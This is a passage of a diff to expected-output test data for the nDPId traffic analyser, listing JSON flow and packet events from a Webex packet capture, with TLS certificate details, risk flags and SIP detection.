Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} 
+01394{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":355,"source":"webex.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570636364,"flow_last_seen":1444570636827,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3939,"flow_tot_l4_payload_len":4002,"flow_avg_l4_payload_len":667,"midstream":0,"thread_ts_msec":1444570636827,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.98","src_port":37129,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} +01395{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":356,"source":"webex.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570636387,"flow_last_seen":1444570636828,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3939,"flow_tot_l4_payload_len":4002,"flow_avg_l4_payload_len":667,"midstream":0,"thread_ts_msec":1444570636828,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41386,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": 
{"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} +01394{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":357,"source":"webex.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1444570636359,"flow_last_seen":1444570636829,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2579,"flow_tot_l4_payload_len":4002,"flow_avg_l4_payload_len":500,"midstream":0,"thread_ts_msec":1444570636829,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.97","src_port":51370,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, 
CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} +01395{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":365,"source":"webex.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570636259,"flow_last_seen":1444570636894,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3939,"flow_tot_l4_payload_len":4002,"flow_avg_l4_payload_len":667,"midstream":0,"thread_ts_msec":1444570636894,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.121.100","src_port":52219,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} 
+01394{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":368,"source":"webex.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570636264,"flow_last_seen":1444570636897,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3939,"flow_tot_l4_payload_len":4002,"flow_avg_l4_payload_len":667,"midstream":0,"thread_ts_msec":1444570636897,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.121.99","src_port":55969,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} +01395{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":381,"source":"webex.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1444570636155,"flow_last_seen":1444570636963,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2527,"flow_tot_l4_payload_len":3970,"flow_avg_l4_payload_len":496,"midstream":0,"thread_ts_msec":1444570636963,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.204.49","src_port":51646,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": 
{"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":409,"source":"webex.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570637191,"flow_last_seen":1444570637191,"flow_idle_time":200000,"flow_min_l4_payload_len":656,"flow_max_l4_payload_len":656,"flow_tot_l4_payload_len":656,"flow_avg_l4_payload_len":656,"midstream":0,"thread_ts_msec":1444570637191,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"172.16.1.75","src_port":64538,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
01312{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":409,"source":"webex.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1444570637191,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":698,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":698,"pkt_l4_len":664,"thread_ts_msec":1444570637191,"pkt":"ABoRAAACABoRAAABCABFAAKsAABAAEARgN0KCAABrBABS\/waE8QCmKnIUkVHSVNURVIgc2lwOjE3Mi4xNi4xLjc1O3RyYW5zcG9ydD1VRFAgU0lQLzIuMA0KVmlhOiBTSVAvMi4wL1VEUCAxMC4xMzMuMjA2LjQ3OjY0NTM4O2JyYW5jaD16OWhHNGJLLTUyNDI4Ny0xLS0tM2U0Njk4NjE4Y2ZiMmI3MztycG9ydA0KTWF4LUZvcndhcmRzOiA3MA0KQ29udGFjdDogPHNpcDo0NTE5MUAxMC4xMzMuMjA2LjQ3OjY0NTM4O3JpbnN0YW5jZT03YTQ2ZjFlMTI3MDJlN2ZiO3RyYW5zcG9ydD1VRFA+DQpUbzogPHNpcDo0NTE5MUAxNzIuMTYuMS43NTt0cmFuc3BvcnQ9VURQPg0KRnJvbTogPHNpcDo0NTE5MUAxNzIuMTYuMS43NTt0cmFuc3BvcnQ9VURQPjt0YWc9ZDM4MzM3NjcNCkNhbGwtSUQ6IEtvcExUdzl4c19sRXBDdGlQYTA3YlEuLg0KQ1NlcTogNCBSRUdJU1RFUg0KRXhwaXJlczogNjANCkFsbG93OiBJTlZJVEUsIEFDSywgQ0FOQ0VMLCBCWUUsIE5PVElGWSwgUkVGRVIsIE1FU1NBR0UsIE9QVElPTlMsIElORk8sIFNVQlNDUklCRQ0KU3VwcG9ydGVkOiByZXBsYWNlcywgbm9yZWZlcnN1YiwgZXh0ZW5kZWQtcmVmZXIsIHRpbWVyLCBvdXRib3VuZCwgcGF0aCwgWC1jaXNjby1zZXJ2aWNldXJpDQpVc2VyLUFnZW50OiBab2lwZXIgcjMzNjg4DQpBbGxvdy1FdmVudHM6IHByZXNlbmNlLCBrcG1sDQpDb250ZW50LUxlbmd0aDogMA0KDQo="} -00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":409,"source":"webex.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570637191,"flow_last_seen":1444570637191,"flow_idle_time":200000,"flow_min_l4_payload_len":656,"flow_max_l4_payload_len":656,"flow_tot_l4_payload_len":656,"flow_avg_l4_payload_len":656,"midstream":0,"thread_ts_msec":1444570637191,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"172.16.1.75","src_port":64538,"dst_port":5060,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} 
-01396{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":411,"source":"webex.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1444570636252,"flow_last_seen":1444570638198,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2842,"flow_tot_l4_payload_len":3970,"flow_avg_l4_payload_len":496,"midstream":0,"thread_ts_msec":1444570638198,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.202.139","src_port":47116,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} -01395{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":412,"source":"webex.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570636270,"flow_last_seen":1444570638199,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":3970,"flow_avg_l4_payload_len":661,"midstream":0,"thread_ts_msec":1444570638199,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.200.11","src_port":47841,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": 
{"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} +00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":409,"source":"webex.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570637191,"flow_last_seen":1444570637191,"flow_idle_time":200000,"flow_min_l4_payload_len":656,"flow_max_l4_payload_len":656,"flow_tot_l4_payload_len":656,"flow_avg_l4_payload_len":656,"midstream":0,"thread_ts_msec":1444570637191,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"172.16.1.75","src_port":64538,"dst_port":5060,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} 
+01396{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":411,"source":"webex.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1444570636252,"flow_last_seen":1444570638198,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2842,"flow_tot_l4_payload_len":3970,"flow_avg_l4_payload_len":496,"midstream":0,"thread_ts_msec":1444570638198,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.202.139","src_port":47116,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} +01395{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":412,"source":"webex.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570636270,"flow_last_seen":1444570638199,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":3970,"flow_avg_l4_payload_len":661,"midstream":0,"thread_ts_msec":1444570638199,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.200.11","src_port":47841,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": 
{"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} 00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":422,"source":"webex.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570638225,"flow_last_seen":1444570638225,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570638225,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"216.58.208.40","src_port":43433,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":422,"source":"webex.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1444570638225,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570638225,"pkt":"ABoRAAACABoRAAABCABFAAA8UR1AAEAGNzMKCAAB2DrQKKmpAbtoC5J\/AAAAAKACOQjy7gAAAgQFtAQCCAoATMNiAAAAAAEDAwY="} 
00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":423,"source":"webex.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1444570638234,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570638234,"pkt":"ABoRAAACABoRAAABCABFAAAoAeFAABAGtoPYOtAoCggAAQG7qamX9G2AaAuSgFAS\/\/9SAQAA"} 01312{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":430,"source":"webex.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":1444570638237,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":698,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":698,"pkt_l4_len":664,"thread_ts_msec":1444570638237,"pkt":"ABoRAAACABoRAAABCABFAAKsAABAAEARgN0KCAABrBABS\/waE8QCmKnIUkVHSVNURVIgc2lwOjE3Mi4xNi4xLjc1O3RyYW5zcG9ydD1VRFAgU0lQLzIuMA0KVmlhOiBTSVAvMi4wL1VEUCAxMC4xMzMuMjA2LjQ3OjY0NTM4O2JyYW5jaD16OWhHNGJLLTUyNDI4Ny0xLS0tM2U0Njk4NjE4Y2ZiMmI3MztycG9ydA0KTWF4LUZvcndhcmRzOiA3MA0KQ29udGFjdDogPHNpcDo0NTE5MUAxMC4xMzMuMjA2LjQ3OjY0NTM4O3JpbnN0YW5jZT03YTQ2ZjFlMTI3MDJlN2ZiO3RyYW5zcG9ydD1VRFA+DQpUbzogPHNpcDo0NTE5MUAxNzIuMTYuMS43NTt0cmFuc3BvcnQ9VURQPg0KRnJvbTogPHNpcDo0NTE5MUAxNzIuMTYuMS43NTt0cmFuc3BvcnQ9VURQPjt0YWc9ZDM4MzM3NjcNCkNhbGwtSUQ6IEtvcExUdzl4c19sRXBDdGlQYTA3YlEuLg0KQ1NlcTogNCBSRUdJU1RFUg0KRXhwaXJlczogNjANCkFsbG93OiBJTlZJVEUsIEFDSywgQ0FOQ0VMLCBCWUUsIE5PVElGWSwgUkVGRVIsIE1FU1NBR0UsIE9QVElPTlMsIElORk8sIFNVQlNDUklCRQ0KU3VwcG9ydGVkOiByZXBsYWNlcywgbm9yZWZlcnN1YiwgZXh0ZW5kZWQtcmVmZXIsIHRpbWVyLCBvdXRib3VuZCwgcGF0aCwgWC1jaXNjby1zZXJ2aWNldXJpDQpVc2VyLUFnZW50OiBab2lwZXIgcjMzNjg4DQpBbGxvdy1FdmVudHM6IHByZXNlbmNlLCBrcG1sDQpDb250ZW50LUxlbmd0aDogMA0KDQo="} 
00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":449,"source":"webex.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":3,"flow_last_seen":1444570639260,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570639260,"pkt":"ABoRAAACABoRAAABCABFAAAoUR5AAEAGN0YKCAAB2DrQKKmpAbtoC5KAl\/RtgVAQOQgY+gAA"} -00975{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":455,"source":"webex.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570638225,"flow_last_seen":1444570639266,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1444570639266,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"216.58.208.40","src_port":43433,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ssl.google-analytics.com","ja3":"75edb912bc6f0a222ae3e3e47f5c89b1","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00975{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":455,"source":"webex.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570638225,"flow_last_seen":1444570639266,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1444570639266,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"216.58.208.40","src_port":43433,"dst_port":443,"l4_proto":"tcp","ndpi": 
{"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ssl.google-analytics.com","ja3":"75edb912bc6f0a222ae3e3e47f5c89b1","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 01312{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":457,"source":"webex.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":3,"flow_last_seen":1444570639266,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":698,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":698,"pkt_l4_len":664,"thread_ts_msec":1444570639266,"pkt":"ABoRAAACABoRAAABCABFAAKsAABAAEARgN0KCAABrBABS\/waE8QCmKnIUkVHSVNURVIgc2lwOjE3Mi4xNi4xLjc1O3RyYW5zcG9ydD1VRFAgU0lQLzIuMA0KVmlhOiBTSVAvMi4wL1VEUCAxMC4xMzMuMjA2LjQ3OjY0NTM4O2JyYW5jaD16OWhHNGJLLTUyNDI4Ny0xLS0tM2U0Njk4NjE4Y2ZiMmI3MztycG9ydA0KTWF4LUZvcndhcmRzOiA3MA0KQ29udGFjdDogPHNpcDo0NTE5MUAxMC4xMzMuMjA2LjQ3OjY0NTM4O3JpbnN0YW5jZT03YTQ2ZjFlMTI3MDJlN2ZiO3RyYW5zcG9ydD1VRFA+DQpUbzogPHNpcDo0NTE5MUAxNzIuMTYuMS43NTt0cmFuc3BvcnQ9VURQPg0KRnJvbTogPHNpcDo0NTE5MUAxNzIuMTYuMS43NTt0cmFuc3BvcnQ9VURQPjt0YWc9ZDM4MzM3NjcNCkNhbGwtSUQ6IEtvcExUdzl4c19sRXBDdGlQYTA3YlEuLg0KQ1NlcTogNCBSRUdJU1RFUg0KRXhwaXJlczogNjANCkFsbG93OiBJTlZJVEUsIEFDSywgQ0FOQ0VMLCBCWUUsIE5PVElGWSwgUkVGRVIsIE1FU1NBR0UsIE9QVElPTlMsIElORk8sIFNVQlNDUklCRQ0KU3VwcG9ydGVkOiByZXBsYWNlcywgbm9yZWZlcnN1YiwgZXh0ZW5kZWQtcmVmZXIsIHRpbWVyLCBvdXRib3VuZCwgcGF0aCwgWC1jaXNjby1zZXJ2aWNldXJpDQpVc2VyLUFnZW50OiBab2lwZXIgcjMzNjg4DQpBbGxvdy1FdmVudHM6IHByZXNlbmNlLCBrcG1sDQpDb250ZW50LUxlbmd0aDogMA0KDQo="} 
00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":461,"source":"webex.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570640269,"flow_last_seen":1444570640269,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570640269,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.202.139","src_port":47135,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 